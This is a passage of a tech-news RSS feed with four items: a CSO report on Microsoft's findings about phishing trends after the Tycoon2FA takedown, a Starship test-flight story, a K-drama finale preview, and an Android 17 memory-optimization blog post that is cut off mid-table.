<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Traditional phishing techniques are in decline as a result of the <a href="https://www.csoonline.com/article/4140890/microsoft-leads-takedown-of-tycoon2fa-phishing-service-infrastructure.html">disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform</a>, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.</p>



<p class="wp-block-paragraph">“Phishing volume linked to the platform fell 92% from pre-disruption averages, including QR code phishing and CAPTCHA-gated phishing both declining from their March highs,” the company wrote in <a href="https://www.microsoft.com/en-us/security/blog/2026/07/23/email-threat-landscape-q2-2026-trends-and-insights/">the report</a>.</p>



<p class="wp-block-paragraph">The takedown reduced activity across multiple phishing categories, forcing attackers to shift to newer delivery methods.</p>



<p class="wp-block-paragraph">Riding this shift in were a few notable phishing campaigns, including an automated <a href="https://www.csoonline.com/article/575559/business-email-compromise-scams-take-new-dimension-with-multi-stage-attacks.html">business email compromise</a> (BEC) campaign that reached 42,000 organizations in under three hours, and a multi-stage phishing campaign that used nested email (EML) files, calendar invitations, and a Microsoft authentication redirect to deliver malware.</p>



<p class="wp-block-paragraph">To counter phishing attacks, Microsoft recommends blocking emails containing known bad URLs/ subject fields, enabling password-less authentication methods, or moving to <a href="https://www.csoonline.com/article/4176814/security-experts-caution-mfa-alone-can-no-longer-stop-threat-actors.html">MFA</a> for accounts that still require passwords.</p>



<h2 class="wp-block-heading">Tycoon2FA disruption sent attackers exploring</h2>



<p class="wp-block-paragraph">The take-down of <a href="https://www.csoonline.com/article/4100393/hybrid-2fa-phishing-kits-are-making-attacks-harder-to-detect.html">Tycoon2FA</a> forced its operators to abandon portions of their infrastructure and rework hosting, domain registrations, and delivery mechanisms.</p>



<p class="wp-block-paragraph">“After falling 15% in March and another 22% in April, Tycoon2FA-linked phishing volume dropped 74% in May to just 1.5 million messages, then fell another 20% in June to 1.2 million, by far the lowest monthly volumes observed in at least a year,” Microsoft said.</p>



<p class="wp-block-paragraph">The decline extended to QR Code <a href="https://www.csoonline.com/article/3557585/attackers-are-using-qr-codes-sneakily-crafted-in-ascii-and-blob-urls-in-phishing-emails.html">lures</a> and fake CAPTCHA <a href="https://www.csoonline.com/article/3829416/fake-captcha-attacks-are-increasing-say-experts.html">pages</a>, two phishing techniques in which Tycoon2FA accounted for 12% and 14% of industry activity in June, respectively. This indicated that the platform’s customer base had not been able to migrate to a replacement infrastructure.</p>



<p class="wp-block-paragraph">But cutting off one head of the hacker hydra only gave rise to new tactics elsewhere.</p>



<p class="wp-block-paragraph">The adaptation came in the form of using Microsoft <a href="https://www.csoonline.com/article/4160858/attackers-abuse-microsoft-teams-to-impersonate-the-it-helpdesk-in-a-new-enterprise-intrusion-playbook.html">Teams as a social engineering channel</a>. Attackers established conversations to build trust before attempting credential theft or delivering malicious payloads. “Teams-based phishing volume climbed steadily throughout Q2, with the average number of detected attacks rising 19% from March to April, holding roughly flat into May (+1%), then increasing another 10% into June,” Microsoft said.</p>



<p class="wp-block-paragraph">Microsoft also observed a highly automated BEC campaign that reached over 67,000 users using scripted emails, Amazon Simple Email Service (SES), and engagement tracking, alongside a separate phishing campaign targeting 107,000 users that abused Microsoft’s authentication flow and trusted cloud services, including Teams archive recording and ICS calendar invite, to disguise malware delivery behind legitimate infrastructure.</p>



<h2 class="wp-block-heading">Phishing changes but the defense doesn’t</h2>



<p class="wp-block-paragraph">While QR Code and Captcha-based phishing attacks dropped significantly in the second quarter, business email compromise (BEC) charted jumped 121% between March and April, before dropping down again in May.</p>



<p class="wp-block-paragraph">QR Code phishing represented 8.3 million attacks in June 2026, down from a peak of 18.7 million in March. Similarly, Captcha-gated phishing fell from 12 million attacks in March to 2.2 million in June.</p>



<p class="wp-block-paragraph">BEC attacks hit 9 million in March, falling to 3.9 million in June.</p>



<p class="wp-block-paragraph">But even as these phishing classics lost momentum and newer techniques emerged, Microsoft’s defensive advice remained rooted in the basics. It noted organizations should complement email filtering with phishing-resistant authentication such as passkeys and phishing-resistant <a href="https://www.csoonline.com/article/3535222/mfa-adoption-is-catching-up-but-is-not-quite-there.html">MFA</a> to reduce the effectiveness of credential theft campaigns.</p>



<p class="wp-block-paragraph">The company also recommended strengthening Exchange Online Protection and Microsoft Defender for Office 365 with capabilities such as Safe links and Zero-hour Auto Purge (ZAP), in which malicious emails already delivered to mailboxes are removed before they are read, alongside enforcing password-less authentication methods like Windows Hello, <a href="https://www.csoonline.com/article/4040128/fido-undermined.html">FIDO </a>keys, and Microsoft Authenticator.</p>



<p class="wp-block-paragraph">Microsoft concluded its report with a list of indicators of compromise (IoCs) from the threats observed in the quarter to support detection efforts.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.csoonline.com/article/4201146/tycoon2fa-takedown-reshapes-the-phishing-landscape.html">CSO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SpaceX's Starship Megarocket Hits Key Milestones in 'Lucky 13' Test Flight]]></title>
<description><![CDATA[SpaceX's Friday launch of its massive Starship rocket "went quite smoothly," reports CNN, with a SpaceX spokesperson calling this mission "Lucky Number 13" (as the 13th integrated flight test for a Starship spacecraft with a Super Heavy rocket booster):


During Starship V3's inaugural test, ther...]]></description>
<link>https://tsecurity.de/de/3694249/it-security-nachrichten/spacexs-starship-megarocket-hits-key-milestones-in-lucky-13-test-flight/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694249/it-security-nachrichten/spacexs-starship-megarocket-hits-key-milestones-in-lucky-13-test-flight/</guid>
<pubDate>Sat, 25 Jul 2026 18:52:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[SpaceX's Friday launch of its massive Starship rocket "went quite smoothly," reports CNN, with a SpaceX spokesperson calling this mission "Lucky Number 13" (as the 13th integrated flight test for a Starship spacecraft with a Super Heavy rocket booster):


During Starship V3's inaugural test, there were numerous engine issues as several on the booster failed to relight and the Starship spacecraft experienced a nail-biting engine outage. SpaceX also was forced to replace six engines on this vehicle ahead of today's flight because of a likely issue with moisture that prevented at least four from starting up correctly during an initial launch attempt last week... [Friday's Super Heavy rocket booster] fired all 33 of its engines in a pristine performance off the launchpad. The rocket booster also managed to relight 13 engines, as planned, to steer itself back toward a controlled landing. Only when Super Heavy attempted to relight its engines for a controlled landing burn over the Gulf waters did problems arise. The landing was still controlled, though Huot said the vehicle was traveling a bit faster than the company had hoped when it made touchdown. (SpaceX always intended to discard this Super Heavy booster in the ocean.) 

The Starship spacecraft had no obvious performance issues, making it all the way through its engine burn and managing to reignite one engine mid-flight as part of a test. It also made a controlled splashdown in the Indian Ocean — executing its "softest splashdown" to date in a "dream scenario," according to SpaceX's Dan Huot. The touchdown came about an hour after takeoff, as planned. During its coasting phase, Starship also deployed 20 Starlink test satellites, paving the way for operational missions later down the line in which SpaceX plans to deploy large batches of these satellites in a single launch. In another big win, SpaceX said it was able to make contact with each of those satellites. 

CNN adds that SpaceX "is facing intense pressure to get Starship ready for a crucial NASA test flight next year that could pave the way for the next moon landing. This flight was also the first for SpaceX as a publicly traded company. Last week's aborted launch attempt sparked a selloff, and shares are still trading below their IPO price. 


"To cap off the roaring success of today's flight test, SpaceX shared some stunning visuals of the upper Starship spacecraft sailing through space."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=SpaceX's+Starship+Megarocket+Hits+Key+Milestones+in+'Lucky+13'+Test+Flight%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F25%2F0511222%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F25%2F0511222%2Fspacexs-starship-megarocket-hits-key-milestones-in-lucky-13-test-flight%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/07/25/0511222/spacexs-starship-megarocket-hits-key-milestones-in-lucky-13-test-flight?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agent Kim Reactivated Finale Preview: Will Agent Kim Fight His Closest Friends?]]></title>
<description><![CDATA[Agent Kim Reactivated Episode 10 will place Manager Kim and his closest allies inside their most personal and dangerous battle yet. With their children being used as hostages, the three fathers must find a way to defeat Ju Gang-chan without turning against each other.




Release date: July 25, 2...]]></description>
<link>https://tsecurity.de/de/3693923/ios-mac-os/agent-kim-reactivated-finale-preview-will-agent-kim-fight-his-closest-friends/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693923/ios-mac-os/agent-kim-reactivated-finale-preview-will-agent-kim-fight-his-closest-friends/</guid>
<pubDate>Sat, 25 Jul 2026 14:45:18 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agent Kim Reactivated Episode 10 will place Manager Kim and his closest allies inside their most personal and dangerous battle yet. With their children being used as hostages, the three fathers must find a way to defeat Ju Gang-chan without turning against each other.




Release date: July 25, 2026



Release time: 9:45 p.m. KST on SBS




Spoiler warning for Episode 9



Episode 9 followed Manager Kim, Seong Han-su and Park Jin-cheol as they entered another heavily guarded location and fought through Gang-chan’s men. Han-su and Jin-cheol handled several attackers together, while Manager Kim used his old operational skills to clear the remaining guards.



However, Gang-chan had already prepared a cruel backup plan. He arranged the kidnapping of Han-su and Jin-cheol’s children, giving him complete control over the fathers before the final confrontation.



The story began with Manager Kim leaving his secret past behind and raising his daughter Min-ji as an ordinary single father. Her disappearance forced him to reactivate his black-ops skills and reconnect with former operatives Han-su and Jin-cheol. Since then, each man’s family has become connected to Manager Kim’s unfinished conflicts.



Will the three agents fight each other?



The Episode 10 preview suggests that Gang-chan will force the three men into a cage and demand that Han-su and Jin-cheol kill Manager Kim. Their children’s survival appears to depend on whether they follow his instructions.



This creates a painful choice for both fathers. Manager Kim previously risked everything to protect their families, but Han-su and Jin-cheol cannot ignore an immediate threat against their children.



Still, the three agents know each other’s abilities well. Their apparent conflict could become part of a plan to distract Gang-chan, escape the cage and reach the hostages before his men can act.



Will all the families survive?



The finale’s official description says the three men become enemies while trying to protect the people they love. This confirms that every family will remain in danger until the final moments.



Manager Kim will likely take the greatest risk because he understands Gang-chan’s methods and refuses to let another child suffer because of his past. Min-ji could also play an important role, especially after repeatedly showing courage during earlier threats.



Episode 10 should end the conflict between Manager Kim and Gang-chan while revealing whether the three fathers can save every hostage. Do you think all the agent families will survive the finale? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Prioritizing Memory Efficiency: Essential Steps for Android 17]]></title>
<description><![CDATA[Posted by Alice Yuan, Developer Relations Engineer, Ajesh Pai, Developer Relations Engineer, and Fung Lam, Developer Relations Engineer



    
        
    



    While app performance is often equated with a smooth UI and fast start times, memory serves as the silent foundation upon which thes...]]></description>
<link>https://tsecurity.de/de/3693508/android-tipps/prioritizing-memory-efficiency-essential-steps-for-android-17/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693508/android-tipps/prioritizing-memory-efficiency-essential-steps-for-android-17/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:41 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCIAoJpwUITPS5C3_eTksMsaslwqPk7SIEQHkwEkGv8572ccdIKcdv6kNC1BOSJPAZTgX5m3liMMv4zdK58e5dWRhUfo39uas23LuhEWf13TFnDTdw-Z5mWn4JarSnC8yCET8Sw15zSF-jQ5zwALriacGK6IjAGxNg61sFtSxzndjvqXxZtJt4qxuzd9A/s2048/Engineering-Memory-Blog-Meta-3.png">

<div class="separator">
    <em>Posted by Alice Yuan, Developer Relations Engineer, Ajesh Pai, Developer Relations Engineer, and Fung Lam, Developer Relations Engineer</em>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanYZz4QpaDuwP7y_ZVGCUh6TpdQxS65pBcYr-Qkawd9YFS587tnIUPnqDROlxIXzgdz6GGxluR3LzH8ZabQPWz382FDEOEDpK3GxUFywn0A54JXFtUwDPaeI0JnFhEl-6NRrcjKeFPMLozNQv_An9OcWEUA-rmXfOhWvIKRrptdblGEZHERD0P-ynFcc/s4209/Engineering-Memory-Blog-3.png">
        <img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhanYZz4QpaDuwP7y_ZVGCUh6TpdQxS65pBcYr-Qkawd9YFS587tnIUPnqDROlxIXzgdz6GGxluR3LzH8ZabQPWz382FDEOEDpK3GxUFywn0A54JXFtUwDPaeI0JnFhEl-6NRrcjKeFPMLozNQv_An9OcWEUA-rmXfOhWvIKRrptdblGEZHERD0P-ynFcc/s16000/Engineering-Memory-Blog-3.png">
    </a>
</div>

<p>
    While app performance is often equated with a smooth UI and fast start times, memory serves as the silent foundation upon which these visible metrics are built. It's no secret that we're seeing a shift where device memory is more important than ever. Not only have we made strides in Android memory optimizations with Android 17, we're providing the tooling and API support to help you stay ahead of stricter memory requirements later this year.
</p>

<p>
    To ensure device stability, starting in Android 17, the system will begin enforcing app memory limits based on the device's total RAM. If an app exceeds those limits, Android will kill the process with no associated stack trace.
</p>

<div>
    Beyond these forced terminations, unoptimized memory usage inevitably degrades the user experience. When the app approaches heap memory limits, it triggers frequent garbage collection—leading to noticeable UI stutters. Furthermore, when a device runs out of available memory, the system scrambles to reclaim pages, causing CPU strain, UI latency, and battery drain. If the memory shortage is too severe, it can cause Low Memory Killer (LMK) events that abruptly terminate background processes and force apps to have slow cold starts and lose user state.
</div>

<div>
    <p>To build highly performant apps and avoid these forced terminations, we recommend that you adopt the following memory optimization strategies:</p>
    <ol>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Maximize">Maximize bytecode optimization with R8</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Optimize">Optimize image loading</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Detect">Detect and fix memory leaks with Android Studio</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Trim">Trim memory when app leaves visible state</a></li>
        <li><a href="http://android-developers.googleblog.com/2026/06/prioritizing-memory-efficiency-steps-for-android-17.html#Advanced">Advanced memory observability with ProfilingManager</a></li>
    </ol>
</div>
<br>
<div>
    <div class="separator">
        
    </div>
    <div>
        <em>A condensed version of this blog post is also available in video format, go check it out!</em>
    </div>
    
    <h3>Understanding Android 17 app memory limits</h3>
    <p>App memory limits are being introduced in Android 17 to prevent "one bad actor" from destroying the multitasking experience and stability of the user’s entire device.</p>
    <p>Here is a breakdown of the reasons driving this architectural change:</p>
    
    <div>
        <ul>
            <li><b>Preventing cascading kills:</b> When an app becomes bloated or leaks memory while holding a privileged state (e.g. it’s running a Foreground Service), it is initially shielded from the system's Low Memory Killer (LMK). As this single app grows unchecked and hoards RAM, the LMK is forced to compensate by killing off dozens of smaller, well-behaved cached apps and background jobs to reclaim space for the memory hog.</li>
            <li><b>Preserving multitasking and user state:</b> When the system is forced to purge cached apps to accommodate a single leaking process, the multitasking experience is severely degraded. Users returning to prior cached applications encounter sluggish cold starts instead of near-instant warm resumes. This inefficiency generates more CPU strain and accelerates battery depletion. It can also destroy the user’s context in recently used apps, such as scroll positions, navigation stacks, and in-game progress.</li>
        </ul>
        
        <div>
            <p>To determine if your app session was impacted by these constraints in the field, you can call <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo#getDescription%28%29" target="_blank">getDescription()</a> within <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo" target="_blank">ApplicationExitInfo</a>. If the system applied a limit, the exit reason is reported as <a href="https://developer.android.com/reference/android/app/ApplicationExitInfo#REASON_OTHER" target="_blank">REASON_OTHER</a> and the description string will contain "MemoryLimiter:AnonSwap". You can also leverage <a href="https://developer.android.com/topic/performance/tracing/profiling-manager/trigger-based-capture" target="_blank">trigger-based profiling</a> using <a href="https://developer.android.com/about/versions/17/features#anomaly-profiling-trigger" target="_blank">TRIGGER_TYPE_ANOMALY</a> to automatically capture heap dumps when the memory limit is reached. Furthermore, Android is actively working to surface more in-field memory metrics to developers within the Google Play Console.</p>
            <p>We have also expanded our <a href="https://developer.android.com/about/versions/17/behavior-changes-all#app-memory-limits" target="_blank">memory limits documentation</a> to include local debugging commands, allowing you to simulate memory constraints in your local environment and validate your application's behavior under any memory limit enforcement. </p>
        </div>
    </div>
</div>

<div>
    <h3>Maximize bytecode optimization with R8</h3>
    <p>A highly effective way to reduce your app's memory footprint is to enable the R8 optimizer. By shrinking classes, methods, and fields into shorter names and stripping out unused code and resources, R8 significantly reduces your app's memory footprint by minimizing the amount of resident code required during execution. </p>
    <p>R8 minimizes resident code, shrinking the memory footprint and lowering LMK termination risk. This results in more frequent warm starts over slow cold starts. Additionally, streamlined bytecode reduces main-thread CPU overhead, directly cutting ANR rates for a more fluid user experience. For example, the digital bank <a href="https://developer.android.com/blog/posts/monzo-boosts-performance-metrics-by-up-to-35-with-a-simple-r8-update" target="_blank">Monzo</a> enabled full R8 optimization and saw a 35% reduction in their ANR rate, a 30% improvement in cold start rate, and a 9% reduction in overall app size.</p>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB61hi7-o6RYAHNOoIg1egyi6iU3iGtLbwfOb-s6r_PadBV2LZzvYtcdD00iwcApjnqmwOssOLFSHv8MG_es8WJWaJUPaO6rMY4ZcINSBFROo_1Di3LVMvIEhPldpzQsUOxV1Z7VfPwvej2fa9a7yCNwBdGOGw2LMLtPrCST6InlqF1xHds30rS76C9no/s2500/pic1-IO26_113_TSV-monzo-casestudy.jpg">
        <img border="0" data-original-height="1406" data-original-width="2500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB61hi7-o6RYAHNOoIg1egyi6iU3iGtLbwfOb-s6r_PadBV2LZzvYtcdD00iwcApjnqmwOssOLFSHv8MG_es8WJWaJUPaO6rMY4ZcINSBFROo_1Di3LVMvIEhPldpzQsUOxV1Z7VfPwvej2fa9a7yCNwBdGOGw2LMLtPrCST6InlqF1xHds30rS76C9no/s16000/pic1-IO26_113_TSV-monzo-casestudy.jpg">
    </a>
</div>
<div>
    <i>The digital bank <a href="https://developer.android.com/blog/posts/monzo-boosts-performance-metrics-by-up-to-35-with-a-simple-r8-update" target="_blank">Monzo</a> enabled full R8 optimization and boosted performance metrics by up to 35%.</i>
</div>

<div>
    <p>To properly configure R8 in your <code>build.gradle</code> file:</p>
    <ul>
        <li>Set <code>isShrinkResources = true</code> and <code>isMinifyEnabled = true</code>.</li>
        <li>Use <code>proguard-android-optimize.txt</code> instead of the legacy <code>proguard-android.txt</code>, which actually prevents optimizations and is no longer supported in Android Gradle Plugin 9.</li>
        <li>Remove <code>android.enableR8.fullMode = false</code> from your <code>gradle.properties</code>.</li>
    </ul>
    
    <p>
        If you are using reflection in your code base, then add <a href="https://developer.android.com/topic/performance/app-optimization/keep-rules-overview#where-to-add-rules" target="_blank">Keep rules</a> to prevent R8 from optimizing those parts of the code. Make sure to scope the keep rules narrowly to get the maximum optimization.
    </p>
    <p>To get the maximum optimization, make sure to follow these best practices in your keep rule file.</p>
    
    <ul>
        <li>Remove global options like <code>-dontoptimize</code>, <code>-dontshrink</code>, and <code>-dontobfuscate</code> that prevent R8 from optimizing the entire codebase </li>
        <li>Remove keep rules that prevent optimizing Android components like Activity, Services, Views or Broadcast receivers.</li>
        <li>Refine the broad package wide keep rules to target only specific classes or methods.</li>
    </ul>
    
    <p>To see more best practices, view our <a href="https://developer.android.com/topic/performance/app-optimization/keep-rules-best-practices" target="_blank">keep rules documentation</a>.</p>
    
    <h3>Library Developer R8 Best Practices</h3>
    <p>If you are a library developer, strictly place the rules your consumers need into your <code>consumer-rules</code> file, and keep your library's internal protection rules in your <code>proguard-rules.pro</code> file. For more information on how to optimize libraries, see <a href="https://developer.android.com/topic/performance/app-optimization/library-optimization" target="_blank">Optimization for library authors</a>.</p>
    
    <h3>R8 Configuration Analyzer</h3>
    <p>To audit your R8 optimization, use the <b><a href="http://developer.android.com/r8-analyzer" target="_blank">Configuration Analyzer</a></b>. Configuration analyzer shows the current state of optimization with Obfuscation, Optimization, and Shrinking scores. With configuration analyzer, you can also understand how many classes, methods or fields are prevented from optimization by each keep rule. Refine these broad package wide keep rules to unlock the maximum optimization.</p>
    <p>Using configuration analyzer, you can also identify keep rules that are subsuming other keep rules, redundant keep rules and unused keep rules.</p>
</div>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib0dTmk8w7EYsDiV0Ufd8CAnpWz36-ZDC_gCGFkS_0CGz0axCxOy3RBxuaOoUbR4kzaeFBXryfSR2rkxRsmTXNrPtuJw8n1DTiZiKDqHjv3AaEXteE9TKV3QxYtwCztvY-8a0GpBlOZhVV1p0ftgdxeiKGGnO3dLu_IOt-TB_7j-ZnbR2jSr_CNYzh-bc/s2048/pic2-r8-config-analyzer.png">
        <img border="0" data-original-height="1156" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEib0dTmk8w7EYsDiV0Ufd8CAnpWz36-ZDC_gCGFkS_0CGz0axCxOy3RBxuaOoUbR4kzaeFBXryfSR2rkxRsmTXNrPtuJw8n1DTiZiKDqHjv3AaEXteE9TKV3QxYtwCztvY-8a0GpBlOZhVV1p0ftgdxeiKGGnO3dLu_IOt-TB_7j-ZnbR2jSr_CNYzh-bc/s16000/pic2-r8-config-analyzer.png">
    </a>
</div>
<div>
    <i>The Configuration Analyzer shows the current state of optimization with Obfuscation, Optimization, and Shrinking scores.</i>
</div>

<div>
    <h4><span>R8 Agent Skill </span></h4>
    <p>You can also leverage the <b><a href="https://github.com/android/skills/tree/main/performance/r8-analyzer" target="_blank">R8 Agent Skill</a></b> with Android Studio agent or other AI tools to resolve misconfigurations and refine your rules resulting in improved app performance. <i>(Insights from AI-driven skills will require technical verification)</i></p>
</div>

<h3>Optimize image loading</h3>
<div>
    <p>Bitmaps are usually the largest common objects residing in your app's memory. They represent the final stage of the image loading process where compressed files, like JPEGs or PNGs, are decoded into raw pixel data for display. This means a tiny 100KB compressed image can balloon into several megabytes of RAM because memory consumption is determined by the image's pixel dimensions and color depth. Since bitmap operations are frequently on the critical path to drawing frames, unoptimized images cause severe memory bloat and UI jank.</p>
    <p>Google recommends leveraging image loading libraries <b><a href="https://github.com/coil-kt/coil" target="_blank">Coil</a></b> for Kotlin-first projects, particularly when developing with Jetpack Compose and <b><a href="https://github.com/bumptech/glide" target="_blank">Glide</a></b> for Java-based applications.</p>
    
    <h4><span>Adopt these five best practices</span></h4>
    <ol>
        <li><b>Downsample images:</b> If you’re loading bitmaps manually, avoid loading a massive image into a tiny thumbnail view; use <a href="https://developer.android.com/topic/performance/graphics/load-bitmap" target="_blank">inSampleSize</a> to load a smaller version. Glide and Coil downsamples images by default and you can configure this downsample strategy using <a href="https://bumptech.github.io/glide/javadocs/470/com/bumptech/glide/load/resource/bitmap/DownsampleStrategy.html" target="_blank">DownsampleStrategy</a> and <a href="https://coil-kt.github.io/coil/image_loaders/" target="_blank">ImageLoader</a> respectively.</li>
        <li><b>Cropping:</b> Avoid embedding padding directly into an image file for letterboxing purposes (e.g., creating a transparent border to expand an image dimensions). Rather than baking in these borders, utilize <a href="https://developer.android.com/reference/android/graphics/drawable/InsetDrawable" target="_blank">InsetDrawable</a> or apply padding directly within the View or Composable containing the bitmap.</li>
        <li><b>Config:</b> Balance memory and quality by choosing the right pixel format. Use <code>RGB_565</code> when transparency isn't needed, which uses half the memory of the default <code>ARGB_8888</code> format. In Glide you can configure this by using <a href="https://bumptech.github.io/glide/javadocs/470/com/bumptech/glide/load/DecodeFormat.html" target="_blank">DecodeFormat</a> and in Coil you can use <a href="https://coil-kt.github.io/coil/api/coil-core/coil3.request/-image-request/" target="_blank">bitmapConfig</a> property.</li>
        <li><b>Prioritize vector drawables:</b> For basic geometric assets, leverage <a href="https://developer.android.com/reference/android/graphics/drawable/ShapeDrawable" target="_blank">ShapeDrawable</a> as a lightweight alternative to decoding rasterized bitmaps. By defining these assets once via XML, you ensure they scale seamlessly across all display densities while effectively eliminating resource-driven memory bloat.</li>
        <li><b>Reuse:</b> If your application manages Bitmaps manually then to minimize memory churn, when a bitmap is no longer required, the app should call <code>bitmap.recycle()</code> and immediately discard the Bitmap reference. If you use an image loading library like Glide or Coil, return the bitmap to the library’s managed pool. By providing an existing buffer for future memory needs, the pool effectively avoids the overhead of new allocations.</li>
    </ol>
    
    <p>Check out our documentation on <a href="https://developer.android.com/develop/ui/compose/graphics/images/optimization" target="_blank">Optimizing performance for images</a> to learn more.</p>
    
    <h4><span>Android Studio tooling</span></h4>
    <p>You can also eliminate redundant bitmaps using Android Studio Narwhal 4. Here is how to hunt them down in five simple steps:</p>
    <ol>
        <li>Open the <b>Profiler</b> tab in Android Studio</li>
        <li>Click <b>Heap Dump</b> (or "Analyze Memory Usage") and hit record to take a snapshot of your app’s current memory state.</li>
        <li>Scan the analysis results for the <b>yellow warning triangle</b> ⚠️, which Android Studio uses to flag duplicate bitmaps being stored multiple times. Alternatively, navigate to the profiler header, choose "Filter by:" and pick the "Duplicate Bitmaps" setting.</li>
        <li>Click on any flagged entry to open the <b>Bitmap Preview</b> pane, allowing you to see exactly which image is the repeat offender.</li>
        <li>Use that visual confirmation to track down the redundant loading logic in your code and implement a better caching strategy.</li>
    </ol>
</div>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDJ6djtozFY7DzrGB-EN8ajLVueF9MdLd4mod4jhtO8YwCzU7ObOwQ2w0Bap5A5NHJ7KVnXIRQqhW8cTdcFhMJPw5FIW1WU7D_Mwm-UC9Fsdr-MOn62xijpjKcS0NeUBnO957jmogGEISNQgeZQk3BVvUWK4BknTjLiuK2TbWCqwO3uTLkjkFhLwJre7w/s2379/pic3-IO26_113_TSV%20-dup-bitmaps-cropped.jpg"><img border="0" data-original-height="1162" data-original-width="2379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDJ6djtozFY7DzrGB-EN8ajLVueF9MdLd4mod4jhtO8YwCzU7ObOwQ2w0Bap5A5NHJ7KVnXIRQqhW8cTdcFhMJPw5FIW1WU7D_Mwm-UC9Fsdr-MOn62xijpjKcS0NeUBnO957jmogGEISNQgeZQk3BVvUWK4BknTjLiuK2TbWCqwO3uTLkjkFhLwJre7w/s16000/pic3-IO26_113_TSV%20-dup-bitmaps-cropped.jpg"></a></div><div class="separator"><i>Look for the yellow warning triangle ⚠️ in heap dumps when using the Android Studio Profiler.</i></div>

<h3>Detect and fix memory leaks with Android Studio</h3>
<p>Memory leaks in Android occur when your code holds onto an object's reference long after its lifecycle has ended. This prevents the Garbage Collector (GC) from reclaiming that memory, eventually leading to sluggish performance or OutOfMemoryError (OOM).</p>
<p>Android Studio Panda 3 features a dedicated <a href="https://square.github.io/leakcanary/" target="_blank">LeakCanary</a> profiler task, allowing developers to analyze real-time memory leaks and map traces within the IDE.</p>
<p>The LeakCanary profiler task in Android Studio actively moves the memory leak analysis from your device to your development machine, resulting in a significant performance boost during the leak analysis phase as compared to on-device leak analysis.</p>

<div class="separator">
    <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBixtkwy1hzwA6mikjRX_6vBJ9OQ_RCYdF94HUF8kOLYzQoQrPMLh_6h9u6EGeLzgFc8yjxg3_8zlqWIDCvKa1py5gyxDXasl8JLPDHSEgPpzPyYqzcme69rRKtfIlhMtyNRWXutGXNy-4WcefhSTBhqBgobK678fqvNqL5peOz1UD6ouunLaKPmJCw0/s2048/pic4-android-studio-leaks.png">
        <img border="0" data-original-height="975" data-original-width="2048" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKBixtkwy1hzwA6mikjRX_6vBJ9OQ_RCYdF94HUF8kOLYzQoQrPMLh_6h9u6EGeLzgFc8yjxg3_8zlqWIDCvKa1py5gyxDXasl8JLPDHSEgPpzPyYqzcme69rRKtfIlhMtyNRWXutGXNy-4WcefhSTBhqBgobK678fqvNqL5peOz1UD6ouunLaKPmJCw0/s16000/pic4-android-studio-leaks.png">
    </a>
</div>
<div>
    <i>LeakCanary memory leak analysis contextualized with <b>Go to declaration</b> for debugging</i>
</div>

<p>Additionally, the leak analysis is now contextualized within the IDE and fully integrated with your source code, providing features like go to declaration and other helpful code connections that drastically reduce the friction and time required to investigate and fix memory leaks.</p>

<div>
    <h4><span>Examples of common memory leaks </span></h4>
    <p>Memory leaks occur when an object persists in memory beyond its intended lifespan. This typically happens due to:</p>
    <ul>
        <li>Retaining references to Fragments, Activities, or Views that are no longer in use.</li>
        <li>Mismanaging Context references.</li>
        <li>Failing to properly unregister observers, listeners, and receivers.</li>
        <li>Creating static references to objects that are bound to components with shorter lifecycles.</li>
    </ul>
    
    <p>Here are a few example scenarios:</p>
    
    <div align="left" dir="ltr">
        <table>
            <colgroup>
                <col>
                <col>
                <col>
            </colgroup>
            <tbody>
                <tr>
                    <td>
                        <p dir="ltr"><span face="'Google Sans',sans-serif">Scenario</span></p>
